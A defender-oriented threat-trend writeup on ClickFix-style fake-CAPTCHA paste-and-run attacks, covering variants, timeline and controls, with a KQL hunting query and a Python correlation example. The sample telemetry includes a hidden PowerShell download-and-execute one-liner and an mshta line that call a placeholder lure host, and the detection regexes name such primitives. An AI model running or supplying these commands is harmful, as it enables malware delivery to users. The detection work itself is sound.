Why This Matters Now

Fake-CAPTCHA paste-and-run, commonly shorthanded as ClickFix or ClearFake depending on the variant, started as a niche social-engineering trick in early 2024 and became one of the most common stage-one execution paths reported across Microsoft, Proofpoint, ReliaQuest, and Sekoia by 2025 and into 2026. The reason it scaled is structural rather than novel: the technique sidesteps email-attachment defenses by moving the malicious code out of the email entirely and into the user's clipboard, where the user themselves becomes the execution vector.

For defenders, the consequence is that the high-fidelity signal moved. The email gateway sees a benign link, or sometimes nothing at all. The browser sees a webpage that legitimately writes to the clipboard. The endpoint sees PowerShell or mshta launched by the user. If telemetry is not joined across those layers, the attack is invisible.

Shape of the Trend

The technique has three common variants. The fake-CAPTCHA variant displays a "verify you are human" overlay that instructs the user to press Win+R, paste a "verification code," and press Enter. The verification code is a PowerShell or mshta one-liner. The fake-error variant shows a Microsoft-styled error dialog claiming the user's browser must be updated and instructs the same paste-and-run sequence to "fix" it. The fake-Cloudflare variant impersonates a legitimate Cloudflare challenge page and uses the same final paste-and-run pattern.

All three rely on JavaScript on the lure page to write the malicious command to the user's clipboard automatically when the user clicks a button labeled "verify" or "continue." From the user's point of view, they are following dialog instructions. From the defender's point of view, the browser process wrote to the clipboard and the user pasted it into a script host within seconds.

Timeline 2024 → 2026

Public reporting suggests early ClickFix and ClearFake variants appeared in the first half of 2024 and were initially associated with a small number of clusters tracked by Proofpoint and Sekoia. By late 2024, the technique was in widespread use across initial-access brokers and ransomware-aligned operators, with public writeups describing a range of commodity loaders as payloads. Through 2025 and into 2026 the variants diversified; per Sekoia and ReliaQuest reporting, the fake-Cloudflare-challenge form gained particular traction in the second half of 2025.

TTPs in Detail

The mechanic depends on three things being true: the lure page must be able to write to the clipboard (a permission most browsers grant on user click), the user must be willing to follow paste-and-run instructions, and a script host (PowerShell, mshta, wscript, conhost) must be available on the endpoint. Public reporting documents pivots into commodity stealers and loaders. Stage-two payloads are operator-dependent and not stable across campaigns, so detection logic that targets the paste-and-run mechanic is more durable than logic targeting any particular follow-on.

The lure pages themselves vary in fidelity. Some are crude and obviously imitations; others are byte-accurate clones of legitimate Cloudflare interstitials. The defender opportunity is not in the page itself but in the cross-layer signal it generates.

What Worked, What Didn't

Email-side controls have not generally caught the technique because the email is often a benign link to a compromised site or an ad-network redirect, with no attachment to scan. URL filtering catches some campaigns when the lure host is known but lags new infrastructure. Browser SmartScreen and SafeBrowsing catch some pages but not enough to be a primary control.

What works is endpoint-side. EDR rules that observe a script host launched by the Run dialog (parent process explorer.exe) with command-line content matching the typical paste-and-run patterns surface the technique reliably. Awareness training also has a measurable effect when it specifically teaches the paste-and-run pattern; according to multiple defender writeups, generic anti-phishing training does not transfer to this case.

Where It's Heading

Public reporting through early 2026 indicates the technique is now a baseline capability across initial-access brokers rather than the signature of any one cluster. Defenders should expect it to continue diversifying in lure presentation while remaining stable in mechanic. The endpoint-side detection signature is durable across variants because the clipboard-write-then-run pattern is what makes the technique work; remove that, and the technique no longer functions.

// Hunt for paste-and-run pattern symptom: a script host launched from
// the Run dialog (explorer.exe parent) with suspicious command-line
// content. Pair with browser-side telemetry where available for
// higher fidelity.
DeviceProcessEvents
| where Timestamp > ago(24h)
| where InitiatingProcessFileName =~ "explorer.exe"
| where FileName in~ ("powershell.exe", "mshta.exe", "wscript.exe", "cmd.exe")
| where ProcessCommandLine matches regex @"(?i)(iex|invoke-expression|downloadstring|frombase64string|webclient|http[s]?://)"
| project Timestamp, DeviceName, AccountName, FileName,
          ProcessCommandLine, InitiatingProcessFileName
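The same hunt expressed offline, as an added example that is not part of the original writeup: it applies the KQL filters above (Run-dialog parent, script host, suspicious command line) to process events and then performs the cross-layer join from "Why This Matters Now", pairing each endpoint hit with a clipboard-write event from browser telemetry on the same device within a short window. The BrowserEvent shape, the sample events and the host lure.example are constructed assumptions, not telemetry from any real product.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Same filters as the KQL hunt: script host, Run-dialog parent, suspicious command line.
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cmd.exe"}
CMDLINE_PATTERN = re.compile(r"(iex|invoke-expression|downloadstring|frombase64string|webclient|https?://)", re.I)

@dataclass
class ProcessEvent:
    ts: datetime
    device: str
    file_name: str
    cmdline: str
    parent: str

@dataclass
class BrowserEvent:  # hypothetical browser telemetry: a page wrote to the clipboard
    ts: datetime
    device: str
    url: str

def is_paste_and_run_candidate(ev: ProcessEvent) -> bool:
    return (ev.parent.lower() == "explorer.exe"
            and ev.file_name.lower() in SCRIPT_HOSTS
            and CMDLINE_PATTERN.search(ev.cmdline) is not None)

def correlate(proc_events, browser_events, window=timedelta(seconds=60)):
    """Pair each endpoint candidate with the latest clipboard write on that device within `window` (None if absent)."""
    hits = []
    for p in proc_events:
        if not is_paste_and_run_candidate(p):
            continue
        prior = [b for b in browser_events
                 if b.device == p.device and timedelta(0) <= p.ts - b.ts <= window]
        hits.append((p, max(prior, key=lambda b: b.ts) if prior else None))
    return hits

# Constructed sample telemetry (not real captures); lure.example is a placeholder host.
T0 = datetime(2026, 1, 15, 9, 0, 0)
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(T0 + timedelta(seconds=20), "WS01", "powershell.exe",
                 "powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('https://lure.example/v')\"",
                 "explorer.exe"),
    ProcessEvent(T0 + timedelta(seconds=30), "WS02", "powershell.exe",
                 "powershell -File C:\\Scripts\\inventory.ps1", "explorer.exe"),  # benign admin use
    ProcessEvent(T0 + timedelta(seconds=40), "WS03", "mshta.exe",
                 "mshta https://lure.example/verify.hta", "chrome.exe"),  # browser parent: outside this rule
]
SAMPLE_BROWSER_EVENTS = [BrowserEvent(T0 + timedelta(seconds=5), "WS01", "https://lure.example/captcha")]
```

Running correlate on the samples yields one hit (WS01) corroborated by the browser clipboard write 15 seconds earlier; the benign script and the browser-spawned mshta are excluded, the latter because the rule, like the KQL, keys on the explorer.exe parent.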